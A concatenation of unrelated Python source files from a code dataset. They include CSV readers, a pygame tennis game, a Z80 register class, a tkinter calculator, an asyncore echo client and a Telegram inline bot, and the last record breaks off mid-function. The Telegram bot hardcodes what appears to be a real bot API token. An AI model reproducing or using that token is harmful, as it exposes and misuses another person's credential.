# read the csv file\n csv_reader = csv.reader(csv_file, delimiter=',')\n row_num = 0\n # loop through each line in csv\n for row in csv_reader:\n # skip the first line, which has the column names\n if row_num != 0:\n cur_scv = health_scv(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n health_scvs.append(cur_scv)\n row_num = row_num + 1\n return health_scvs\n\ndef read_housing():\n housing_scvs = []\n title = \"\" \n # open the csv file\n with open('services_csv_files\\housing_scvs.csv') as csv_file:\n # read the csv file\n csv_reader = csv.reader(csv_file, delimiter=',')\n row_num = 0\n # loop through each line in csv\n for row in csv_reader:\n # skip the first line, which has the column names\n if row_num != 0:\n cur_scv = housing_scv(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9])\n housing_scvs.append(cur_scv)\n row_num = row_num + 1 \n return housing_scvs \n\ndef read_job():\n job_scvs = []\n title = \"\" \n # open the csv file\n with open('services_csv_files\\job_scvs.csv') as csv_file:\n # read the csv file\n csv_reader = csv.reader(csv_file, delimiter=',')\n row_num = 0\n # loop through each line in csv\n for row in csv_reader:\n # skip the first line, which has the column names\n if row_num != 0:\n cur_scv = job_scv(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9])\n job_scvs.append(cur_scv)\n row_num = row_num + 1\n return job_scvs \n\nuser = getUser()\nprint(f\"Hello {user.first} {user.last}, let's find some services that are right for you!\")\n\nserv_list = read_health()\nprint(\"\\nHere are some health services for you: \")\nprintservice(serv_list)\n\nserv_list = read_housing()\nprint(\"\\nHere are some housing services for you: \")\nprintservice(serv_list)\n\nserv_list = read_job()\nprint(\"\\nHere are some job services for you: \")\nprintservice(serv_list)\n\nmap_1.domap()","sub_path":"end_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"592354209","text":"from app import db\nfrom datetime import datetime\nfrom app.model_base import model_base, myeye_model_base\n\nclass photo_model(model_base , myeye_model_base, db.Model):\n __tablename__ = 'device_photo'\n\n id = db.Column(db.Integer, nullable=False, primary_key=True, autoincrement=True)\n taskid = db.Column(db.Integer, db.ForeignKey('tasks.id'))\n deviceid = db.Column(db.String(50), db.ForeignKey('devices.deviceid'))\n path = db.Column(db.String(250), nullable=True, unique=False)\n size = db.Column(db.Integer, nullable=True, unique=False)\n time = db.Column(db.DateTime, default=datetime.now)\n\n columns_to_json = ['deviceid', 'taskid', 'path', 'size', 'time']\n\n def __repr__(self):\n return '' % (self.taskid)\n\n def __init__(self, taskid, deviceid, result):\n self.taskid = taskid\n self.deviceid = deviceid\n self.path = result.get('path', '')\n self.size = result.get('size', 0)\n\n","sub_path":"app/myeye/cameramodule/models/photo_model.py","file_name":"photo_model.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"632864929","text":"# -*- coding: utf-8 -*- \n\nimport os\n\nimport web \n\ncurdir = os.path.dirname(__file__)\n\n# 上传文件夹\nrelative_path = '/static/upfile/' #相对路径存入数据库,用于浏览器访问\nupload_dir = curdir + relative_path #绝对路径用于保存上传的头像\n\n\ndb_path = curdir + '/db.json' #数据库的配置文件\n\ndebug = False\n\n# url规则\nurls = (\n '/', 'src.login.Login',\n '/login', 'src.login.Login',\n '/quit', 'src.login.Quit',\n '/register', 'src.register.Register',\n '/information', 'src.information.Information',\n '/upload', 'src.image.Upload',\n '/portrait', 'src.image.AccessHandler',\n)\n\nrender = web.template.render(curdir+'/templates/', base='base')\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"608280841","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 8 22:30:12 2021\r\n\r\n@author: andya\r\n\"\"\"\r\n\r\ndef solution(A):\r\n \r\n peak_loc = []\r\n for i in range(len(A)-2):\r\n if A[i] < A[i+1] and A[i+1] > A[i+2]:\r\n peak_loc.append(i+1)\r\n \r\n max_block = 0\r\n for i in range(len(A)+1,0,-1):\r\n if len(A)%i == 0:\r\n temp_max_block = int(len(A)/i)\r\n temp_peak = 0\r\n \r\n if len(peak_loc) > max_block:\r\n for j in range(0, len(A), i):\r\n for k in peak_loc:\r\n if j <= k <= j+i:\r\n temp_peak += 1\r\n if temp_peak == temp_max_block:\r\n max_block = temp_max_block\r\n return max_block\r\n \r\n","sub_path":"10_4_Peaks.py","file_name":"10_4_Peaks.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"195721756","text":"# Given an unsorted array of integers, find the length of the longest\n# consecutive elements sequence.\n# \n# For example,\n# Given [100, 4, 200, 1, 3, 2],\n# The longest consecutive elements sequence is [1, 2, 3, 4].\n# Return its length: 4.\n# \n# Your algorithm should run in O(n) complexity.\nimport unittest\n\nclass Solution:\n # @param num, a list of integer\n # @return an integer\n def longestConsecutive(self, num):\n hashmap = set(num)\n count = 0\n while len(hashmap)!=0:\n item = hashmap.pop()\n temp = n1 = n2 = 1\n while item-n1 in hashmap or item+n2 in hashmap:\n if item-n1 in hashmap:\n temp += 1\n hashmap.discard(item-n1)\n n1 += 1\n if item+n2 in hashmap:\n temp += 1\n hashmap.discard(item+n2)\n n2 += 1\n count = max(temp, count)\n return count\n\nclass TestFunctions(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_basic1(self):\n self.assertEqual(self.sol.longestConsecutive([100, 4, 200, 1, 3, 2]), 4)\n\n def test_basic2(self):\n self.assertEqual(self.sol.longestConsecutive([9,1,-3,2,4,8,3,-1,6,-2,-4,7]), 4)\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestFunctions)\nunittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"leetcode/longestConsecutive.py","file_name":"longestConsecutive.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"545964181","text":"from .exceptions import Z80StateException\nfrom .registers import Register16, Register8, register_map\n\n\"\"\"\n Copyright 2018 Robert L Snyder, Ithaca, NY \n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\n\nclass Z80State(object):\n \"\"\"\n This class represents the state of a Z80 CPU (registers, flags).\n \"\"\"\n\n def __init__(self):\n self._reg16 = {k: 0x00 for k in list(Register16)}\n self._reg8 = {Register8.I: 0x00, Register8.R: 0x00}\n\n # -------------------------------------------------------------------------\n\n def get_register_16(self, register):\n \"\"\"\n Obtains the 16 bit value from a 16 bit / combined register.\n\n :param register: the Register enum of the desired register\n :return: an integer value\n \"\"\"\n\n if not isinstance(register, Register16):\n raise Z80StateException(\"The 16-bit register designation %s is invalid.\" % register)\n return self._reg16[register]\n\n def set_register_16(self, register, v):\n \"\"\"\n Sets the 16 bit value of an 16 bit / combined register.\n\n :param register: the Register enum of the desired register\n :param v: the integer value to set; will be truncated to 16 bits\n \"\"\"\n\n if not isinstance(register, Register16):\n raise Z80StateException(\"The 16-bit register designation %s is invalid.\" % register)\n self._reg16[register] = v & 0xFFFF\n\n def get_register_8(self, register):\n \"\"\"\n Obtains the 8 bit value from an 8 bit register.\n :param register: the Register enum of the desired register\n :return: an integer value\n \"\"\"\n\n if not isinstance(register, Register8):\n raise Z80StateException(\"The 8-bit register designation %s is invalid.\" % register)\n if register in self._reg8:\n return self._reg8[register]\n else:\n return (self._reg16[register_map[register].target] >> register_map[register].shift) & 0x00FF\n\n def set_register_8(self, register, v):\n \"\"\"\n Sets the 8 bit value of an 8 bit register.\n :param register: the Register enum of the desired register\n :param v: the integer value to set; will be truncated to 8 bits\n \"\"\"\n\n if not isinstance(register, Register8):\n raise Z80StateException(\"The 8-bit register designation %s is invalid.\" % register)\n if register in self._reg8:\n self._reg8[register] = v & 0x00FF\n else:\n if register_map[register].shift == 8:\n self._reg16[register_map[register].target] = ((v << 8) & 0xFF00) | (\n self._reg16[register_map[register].target] & 0x00FF)\n else:\n self._reg16[register_map[register].target] = (v & 0x00FF) | (\n self._reg16[register_map[register].target] & 0xFF00)\n","sub_path":"simulation/z80/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"526414222","text":"from tkinter import *\r\n\r\ndef calculateInterest():\r\n p = float(principle.get())\r\n r = float(rate.get())\r\n t = float(time.get())\r\n i = (p*r*t)/100\r\n i = round(i, 2)\r\n\r\n result.destroy()\r\n\r\n message = Label(resultFrame, text = 'Interest on Rs. ' + str(p)+ \" at rate of interest \" + str(r) + \"% for \" + str(t)+ \" years is Rs. \" + str(i), bg = 'lightcyan', font = (\"Calibri\", 12), width = 70)\r\n message.place(x = 20, y = 40)\r\n message.pack()\r\n\r\nwindow = Tk()\r\n\r\nwindow.title(\"Simple Interest Calculator\")\r\nwindow.geometry(\"600x400\")\r\nwindow.configure(bg = 'lightcyan')\r\n\r\nappLabel = Label(window, text = 'SIMPLE INTEREST CALCULATOR', fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 20), bd = 5)\r\nappLabel.place(x = 20, y = 20)\r\n\r\nprincipleLabel = Label(window, text = 'Principle in Rs.', fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 12), bd = 5)\r\nprincipleLabel.place(x = 20, y = 90)\r\n\r\nprinciple = Entry(window, text = \"\", bd = 2, width = 22)\r\nprinciple.place(x = 200, y = 90)\r\n\r\nrateLabel = Label(window, text = \"Rate of Interest %\", fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 12))\r\nrateLabel.place(x = 20, y = 140)\r\n\r\nrate = Entry(window, text = \"\", bd = 2, width = 15)\r\nrate.place(x = 200, y = 140)\r\n\r\ntimeLabel = Label(window, text = \"Time in years\", fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 12))\r\ntimeLabel.place(x = 20, y = 190)\r\n\r\ntime = Entry(window, text = \"\", bd = 2, width = 15)\r\ntime.place(x = 200, y = 190)\r\n\r\ncalculateButton = Button(window, text = 'CALCULATE', fg = 'black', bg = 'cyan', bd = 4, command = calculateInterest)\r\ncalculateButton.place(x = 20, y = 250)\r\n\r\nresultFrame = LabelFrame(window, text = 'Result', bg = 'lightcyan', font = (\"Calibri\", 11), width = 450)\r\nresultFrame.pack(padx = 20, pady = 20)\r\nresultFrame.place(x = 20, y = 300)\r\n\r\nresult = Label(resultFrame, text = 'Your result will be displayed here', bg = 'lightcyan', font = (\"Calibri\", 12), width = 70)\r\nresult.place(x = 20, y = 20)\r\nresult.pack()\r\n\r\nwindow.mainloop()\r\n","sub_path":"simpleinterest.py","file_name":"simpleinterest.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"555763400","text":"#!/usr/bin/env python2\n##------------------------------------------------------\n##\n## By: Jessica Ingrassellino\n## Publisher: Packt Publishing\n## Pub. Date: April 14, 2016\n## Web ISBN-13: 978-1-78528-585-1\n## Print ISBN-13: 978-1-78217-506-3\n##\n## Python Projects for Kids\n## Chapter 9 - Tiny Tennis\n##\n##------------------------------------------------------\n\n# imports, globals and drawing\n\n# imported libraries go here\nimport time\nimport pygame\nimport random\nimport math\nimport sys\n\nsys.path.append('./lib')\n\nfrom Color.Helper import Helper\nfrom TinyTennis.Ball import Ball\nfrom TinyTennis.Paddle import Paddle\nfrom TinyTennis.Screen import Screen\nfrom TinyTennis.ScoreKeeper import ScoreKeeper\n\ncolor_helper = Helper()\n\nNUMBER_BALLS = 1\n\nball_uid = 1\n\nball_dict = {}\n\nBALL_RADIUS = 10\nBALL_VELOCITY = 5\n\nBALL_COLOR = color_helper.getWhite()\nCOURT_COLOR = color_helper.getBlack()\nPADDLE_COLOR = color_helper.getBlue()\nNET_COLOR = color_helper.getYellow()\nSCORE_TEXT_COLOR = color_helper.getWhite()\n\nscreen = Screen(800, 500)\n\nscore_keeper = ScoreKeeper()\n\n# screen globals\nscreen_width = screen.getWidth()\nscreen_height = screen.getHeight()\n\ndef create_ball(i):\n\n\tball = Ball(int(screen_width / 2), int(screen_height / 2), BALL_VELOCITY, BALL_VELOCITY, BALL_RADIUS)\n\n\tball.setScreenHeight(screen_height)\n\n\tball.setScreenWidth(screen_width)\n\n\tglobal ball_uid\n\n\tball_uid += 1\n\n\tball.setId(ball_uid)\n\n\tglobal ball_dict\n\n\tball_dict[ball_uid] = ball\n\n\ndef initialize_balls(num_balls):\n\n\tfor i in range(num_balls):\n\t\n\t\tprint(\"Processing %d\" % i)\n\n\t\tcreate_ball(i)\n\n\ndef point_scored():\n\n\tglobal NUMBER_BALLS\n\t\n\tNUMBER_BALLS += 1\n\t\n\tinitialize_balls(NUMBER_BALLS)\n\t\n\tfor ball_id in ball_dict:\n\t\n\t\tball = ball_dict[ball_id]\n\n\t\tball.serve()\n\n\ndef remove_ball(ball_id):\n\n\tglobal ball_dict\n\n\tif ball_id in ball_dict:\t\n\t\tdel ball_dict[ball_id]\n\telse:\n\t\tprint(\"ball with id %d does not exist\" % ball_id)\n\n\n# initialize pygame\npygame.init()\n\ngame_screen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Tiny Tennis\")\nfont = pygame.font.SysFont(\"monospace\", 75)\n\ninitialize_balls(NUMBER_BALLS)\n\npaddle1 = Paddle(10, 10, 25, 100)\npaddle1.setScreenHeight(screen_height)\n\npaddle2 = Paddle(screen_width - 35, 10, 25, 100)\npaddle2.setScreenHeight(screen_height)\n\npygame.mouse.set_visible(0)\n\ndo_main = True\n\nwhile do_main:\n\n\t# moving the paddles\n\tpressed = pygame.key.get_pressed()\n\n\tpygame.key.set_repeat()\n\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tdo_main = False\n\n\tif pressed[pygame.K_ESCAPE]:\n\t\tdo_main = False\n\n\tif pressed[pygame.K_w]:\n\t\tpaddle1.moveDown()\n\telif pressed[pygame.K_s]:\n\t\tpaddle1.moveUp()\n\n\tif pressed[pygame.K_UP]:\n\t\tpaddle2.moveDown()\n\telif pressed[pygame.K_DOWN]:\n\t\tpaddle2.moveUp()\n\n\n\t# collision of paddle with top/bottom of screen\n\tpaddle1.updateVerticalPosition()\n\n\tpaddle2.updateVerticalPosition()\n\n\tgame_screen.fill(COURT_COLOR)\n\n\n\tfor ball_id in ball_dict:\n\n\t\tball = ball_dict[ball_id]\n\n\t\tball.updatePosition()\n\n\t\t# left paddle\n\t\tif ball.getXPos() < paddle1.getXPos() + paddle1.getWidth() and ball.getYPos() >= paddle1.getYPos() and ball.getYPos() <= paddle1.getYPos() + paddle1.getHeight():\n\t\t\tball.changeXVel()\n\n\t\t# right paddle\n\t\tif ball.getXPos() > paddle2.getXPos() and ball.getYPos() >= paddle2.getYPos() and ball.getYPos() <= paddle2.getYPos() + paddle2.getHeight():\n\t\t\tball.changeXVel()\n\n\t\t# keeping score\n\t\tif ball.getXPos() <= 0:\n\n\t\t\tscore_keeper.incrementPlayer2Score()\n\t\t\t\n\t\t\tremove_ball(ball_id)\n\n\t\t\tpoint_scored()\n\n\t\telif ball.getXPos() >= screen_width:\n\n\t\t\tscore_keeper.incrementPlayer1Score()\n\n\t\t\tremove_ball(ball_id)\n\n\t\t\tpoint_scored()\n\n\t\tballr = pygame.draw.circle(game_screen, BALL_COLOR, (ball.getXPos(), ball.getYPos()), ball.getRadius(), 0)\n\t\tprint(\"moving ball %s\" % ball.getId())\n\n\n\tpaddle_1 = pygame.draw.rect(game_screen, PADDLE_COLOR, (paddle1.getXPos(), paddle1.getYPos(), paddle1.getWidth(), paddle1.getHeight()), 0)\n\t\n\tpaddle_2 = pygame.draw.rect(game_screen, PADDLE_COLOR, (paddle2.getXPos(), paddle2.getYPos(), paddle2.getWidth(), paddle2.getHeight()), 0)\n\t\n\tnet = pygame.draw.line(game_screen, NET_COLOR, (screen_width/2,5), (screen_width/2, screen_height))\n\t\n\tscore_text = font.render(str(score_keeper.getPlayer1Score()) + \" \" + str(score_keeper.getPlayer2Score()), 1, SCORE_TEXT_COLOR)\n\n\tgame_screen.blit(score_text, (screen_width / 2 - score_text.get_width() / 2, 10))\n\n\tpygame.display.update()\n\n\ttime.sleep(0.016666667)\n\n\n\npygame.quit()\n\n","sub_path":"python-projects-for-kids/tiny_oo_lotsa_balls.py","file_name":"tiny_oo_lotsa_balls.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"626611935","text":"\"\"\"Holds a reference to the main Window instance and provides the MainPage\r\nclass.\"\"\"\r\n\r\nimport pyglet\r\nfrom pyglet.event import EVENT_HANDLED\r\nfrom pyglet.window import key\r\nfrom pyperclip import copy\r\nfrom attr import attrs\r\nfrom pyglet_pages.pages import Page, Modifiers\r\nfrom pyglet_pages.controls import Menu, Text\r\nimport application\r\nfrom messages import container\r\nfrom speech import speak, output\r\n\r\n\r\ndef loop():\r\n \"\"\"The main event loop.\"\"\"\r\n while True:\r\n pyglet.clock.tick()\r\n for window in pyglet.app.windows:\r\n window.switch_to()\r\n window.dispatch_events()\r\n window.dispatch_event('on_draw')\r\n window.flip()\r\n yield\r\n\r\n\r\n@attrs\r\nclass MainPage(Page):\r\n \"\"\"The page which sends hotkeys to the server.\"\"\"\r\n\r\n def __attrs_post_init__(self):\r\n self.hotkey('UP', modifiers=Modifiers(shift=True))(self.view_item)\r\n self.hotkey('DOWN', modifiers=Modifiers(shift=True))(self.copy_item)\r\n for direction in ('left', 'right', 'up', 'down', 'home', 'end'):\r\n self.hotkey(direction.upper())(getattr(self, f'do_{direction}'))\r\n\r\n def do_left(self, symbol, modifiers):\r\n \"\"\"Previous buffer.\"\"\"\r\n return self.change_buffer(-1)\r\n\r\n def do_right(self, symbol, modifiers):\r\n return self.change_buffer(1)\r\n\r\n def do_up(self, symbol, modifiers):\r\n return self.change_message(-1)\r\n\r\n def do_down(self, symbol, modifiers):\r\n return self.change_message(1)\r\n\r\n def do_home(self, symbol, modifiers):\r\n return self.get_end_item('first')\r\n\r\n def do_end(self, symbol, modifiers):\r\n return self.get_end_item('last')\r\n\r\n def copy_item(self, symbol, modifiers):\r\n \"\"\"Copy the current buffer item to the clipboard.\"\"\"\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n try:\r\n i = b.get_current_item()\r\n copy(i)\r\n speak(f'Copied {i}')\r\n except IndexError:\r\n speak('Buffer is empty.')\r\n return EVENT_HANDLED\r\n\r\n def view_item(self, symbol, modifiers):\r\n \"\"\"View the current buffer item in a text box.\"\"\"\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n try:\r\n i = b.get_current_item()\r\n m = Menu('View Buffer Item', escapable=True)\r\n m.add_control(Text, 'Item', text=i)\r\n m.attach(application.window)\r\n except IndexError:\r\n speak('Buffer is empty.')\r\n return EVENT_HANDLED\r\n\r\n def get_end_item(self, name):\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n try:\r\n message = getattr(b, f'get_{name}_item')()\r\n speak(message)\r\n except IndexError:\r\n speak('This buffer is empty.')\r\n return EVENT_HANDLED\r\n\r\n def change_buffer(self, direction):\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n if direction == -1:\r\n buffer = container.previous_buffer()\r\n else:\r\n buffer = container.next_buffer()\r\n speak(buffer.name or 'Miscelaneous')\r\n return EVENT_HANDLED\r\n\r\n def change_message(self, direction):\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n elif not b.items:\r\n speak('This buffer is empty.')\r\n if direction == 1:\r\n func = b.get_next_item\r\n end = 'end'\r\n else:\r\n func = b.get_previous_item\r\n end = 'Start'\r\n try:\r\n message = func(wrap=False)\r\n speak(message)\r\n except RuntimeError:\r\n speak(f'{end} of buffer.')\r\n speak(b.get_current_item())\r\n return EVENT_HANDLED\r\n\r\n def on_key_press(self, symbol, modifiers):\r\n if symbol == key.LCTRL and modifiers == key.MOD_CTRL:\r\n o = output.get_first_available_output()\r\n if o.system_output:\r\n o.silence()\r\n if super().on_key_press(symbol, modifiers) is not EVENT_HANDLED:\r\n if symbol == key.F4 and modifiers & key.MOD_ALT:\r\n return\r\n elif application.connection is None:\r\n speak('You are not currently connected.')\r\n else:\r\n if modifiers:\r\n mods = key.modifiers_string(\r\n modifiers\r\n ).lower().replace('mod_', '').split('|')\r\n else:\r\n mods = []\r\n application.connection.send(\r\n 'key', key.symbol_string(symbol).strip('_'), mods\r\n )\r\n return EVENT_HANDLED\r\n","sub_path":"client/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"140146089","text":"#coding = utf-8\n\nimport os\n\ntrain_img_path = '/home/flyingbird/Documents/reid_competition/test/query_a'\ntrain_txt_path = '/home/flyingbird/Documents/reid_competition/test/query_a_list.txt'\n# test_img_path = '/home/zx/zxfile/contest/deep-person-reid-master/torchreid/data/contestdata/query'\n# test_txt_path = '/home/zx/zxfile/contest/deep-person-reid-master/torchreid/data/contestdata/query_a_list.txt'\nnum=0\nwith open(train_txt_path, 'r') as file:\n lines = file.readlines()\n for line in lines:\n line=line.strip('\\n').split(' ')\n #img_id = int(line[1])\n img_id = line[1].zfill(4)\n img_name = line[0].split('/')[1]\n cam_id = 'c1'\n src = os.path.join(os.path.abspath(train_img_path),img_name)\n dst = os.path.join(os.path.abspath(train_img_path),format(str(img_id),'0>4s')+'_'+cam_id+'_'+img_name[:-4]+'.png')\n\n try:\n os.rename(src,dst)\n num+=1\n print('convert %s to %s..' % (src, dst))\n except:\n continue\n\nprint ('total %d to rename ' % (num))\n\n","sub_path":"data/test/datadeal.py","file_name":"datadeal.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"315717956","text":"import json\nfrom data_process import MSSQL\n\nif __name__ == '__main__':\n #dt = input()\n #table_name = 'UserPingListTable{}'.format(dt)\n with open('db_settings', 'r') as sf:\n s = json.load(sf)\n db = MSSQL(host=s['host'], user=s['user'], pwd=s['pwd'], db=s['db'])\n\n #db.deal_raw_table(table_name)\n #db.process_data(table_name)\n db.get_report()\n","sub_path":"UserPingReceiver/DealWithTables/deal_a_table.py","file_name":"deal_a_table.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450812829","text":"import sys\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow\n\nfrom Login import Login\nfrom Home import Home\nfrom TrangChu import TrangChu\nfrom NhanVien import NhanVien\nfrom Update_Info import Update_Info\nfrom Update import update\nfrom HomeNV import HomeNV\nclass Controller:\n\n def __init__(self):\n self.home = QMainWindow()\n self.dia = None\n\n def show_login(self):\n self.login = Login()\n self.login.switch_window.connect(self.show_home)\n self.login.switch_window2.connect(self.show_home_NV)\n\n if self.home.isVisible():\n self.home.close()\n #self.login.show()\n\n def show_home(self):\n self.home = Home()\n self.home.switch_window.connect(self.show_window_two)\n self.home.switch_window2.connect(self.show_window_two_NV)\n self.login.close()\n #self.home.show()\n\n def show_home_NV(self):\n self.home = HomeNV()\n self.home.switch_window.connect(self.show_window_two)\n self.login.close()\n\n def show_window_two(self):\n if self.dia is None:\n self.dia = TrangChu()\n self.home.mdi.addSubWindow(self.dia)\n self.dia.switch_window.connect(self.show_login)\n self.dia.show()\n else:\n if self.dia.isVisible():\n self.dia.close()\n self.dia = None\n\n def show_window_two_NV(self):\n if self.dia is None:\n self.dia = NhanVien()\n self.home.mdi.addSubWindow(self.dia)\n self.dia.switch_window.connect(self.show_update_info)\n # self.dia.switch_window.connect(self.show_login)\n self.dia.show()\n else:\n if self.dia.isVisible():\n self.dia.close()\n self.dia = None\n\n def show_update_info(self):\n self.update_info = Update_Info()\n self.update_info.switch_window.connect(self.show_update)\n\n\n def show_update(self):\n self.update = update(self.update_info.txtTim.text())\n\n\n\n\n\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n controller = Controller()\n controller.show_login()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()","sub_path":"pyqt5/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"171662175","text":"# -*- coding: UTF-8 -*-\r\nimport gevent.monkey\r\ngevent.monkey.patch_all()\r\nimport os\r\nimport sys\r\nimport pwd\r\nimport signal\r\nimport time\r\nimport socket\r\nimport logging\r\nimport asyncore\r\n\r\nclass EchoClient(asyncore.dispatcher):\r\n \"\"\"Sends messages to the server and receives responses.\r\n \"\"\"\r\n\r\n def __init__(self, host, port, message, chunk_size=512):\r\n self.message = message\r\n self.to_send = message\r\n self.received_data = []\r\n self.chunk_size = chunk_size\r\n self.logger = logging.getLogger('EchoClient')\r\n asyncore.dispatcher.__init__(self)\r\n self.create_socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.logger.debug('connecting to %s', (host, port))\r\n self.connect((host, port))\r\n return\r\n\r\n def handle_connect(self):\r\n self.logger.debug('handle_connect()')\r\n\r\n def handle_close(self):\r\n self.logger.debug('handle_close()')\r\n self.close()\r\n received_message = ''.join(self.received_data)\r\n if received_message == self.message:\r\n self.logger.debug('RECEIVED COPY OF MESSAGE')\r\n else:\r\n self.logger.debug('ERROR IN TRANSMISSION')\r\n self.logger.debug('EXPECTED \"%s\"', self.message)\r\n self.logger.debug('RECEIVED \"%s\"', received_message)\r\n return\r\n\r\n def writable(self):\r\n self.logger.debug('writable() -> %s', bool(self.to_send))\r\n return bool(self.to_send)\r\n\r\n def handle_write(self):\r\n sent = self.send(self.to_send[:self.chunk_size])\r\n self.logger.debug('handle_write() -> (%d) \"%s\"', sent, self.to_send[:sent])\r\n self.to_send = self.to_send[sent:]\r\n\r\n def handle_read(self):\r\n data = self.recv(self.chunk_size)\r\n self.logger.debug('handle_read() -> (%d) \"%s\"', len(data), data)\r\n self.received_data.append(data)\r\n\r\ndef handle_exit(*args, **kw):\r\n logging.info('emstpd(pid=%s) exited', os.getpid())\r\n sys.exit()\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(level=logging.DEBUG,\r\n # format='%(name)s: %(message)s',\r\n format='%(asctime)s %(levelname)s %(module)s:%(lineno)s %(message)s',\r\n )\r\n\r\n client = EchoClient('localhost', 33333, message=open('requirement.txt', 'r').read())\r\n\r\n try:\r\n asyncore.loop()\r\n except KeyboardInterrupt:\r\n pass","sub_path":"python/ap/_gevent/g_client.py","file_name":"g_client.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"95806800","text":"from html import escape\nfrom uuid import uuid4\n\nfrom telegram import InlineQueryResultArticle, InputTextMessageContent, Update\nfrom telegram.constants import ParseMode\nfrom telegram.ext import Application, CommandHandler, ContextTypes, InlineQueryHandler\n\n\nasync def start(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n\n \"\"\"Send a message when the command /start is issued.\"\"\"\n\n await update.message.reply_text(\"Hi!\")\n\n\nasync def help_command(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n\n \"\"\"Send a message when the command /help is issued.\"\"\"\n\n await update.message.reply_text(\"Help!\")\n\n\nasync def inline_query(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n\n \"\"\"Handle the inline query. This is run when you type: @botusername \"\"\"\n\n query = update.inline_query.query\n\n if query == \"\":\n return\n results = [\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Caps\",\n input_message_content=InputTextMessageContent(query.upper()),\n ),\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Bold\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n ),\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Italic\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n ),\n\n ]\n\n await update.inline_query.answer(results)\n\n\ndef main() -> None:\n\n application = Application.builder().token(\"5519492104:AAHqshbIG-CmFdl6UDLSRqJWi4XtLvriaCw\").build()\n\n # on different commands - answer in Telegram\n application.add_handler(CommandHandler(\"start\", start))\n application.add_handler(CommandHandler(\"help\", help_command))\n\n # on non command i.e message - echo the message on Telegram\n application.add_handler(InlineQueryHandler(inline_query))\n # Run the bot until the user presses Ctrl-C\n\n application.run_polling()\n\n\nasync def inline_caps(self, update, context):\n \"\"\"Handle the inline query. This is run when you type: @botusername \"\"\"\n query = update.inline_query.query\n if not query:\n return\n results = 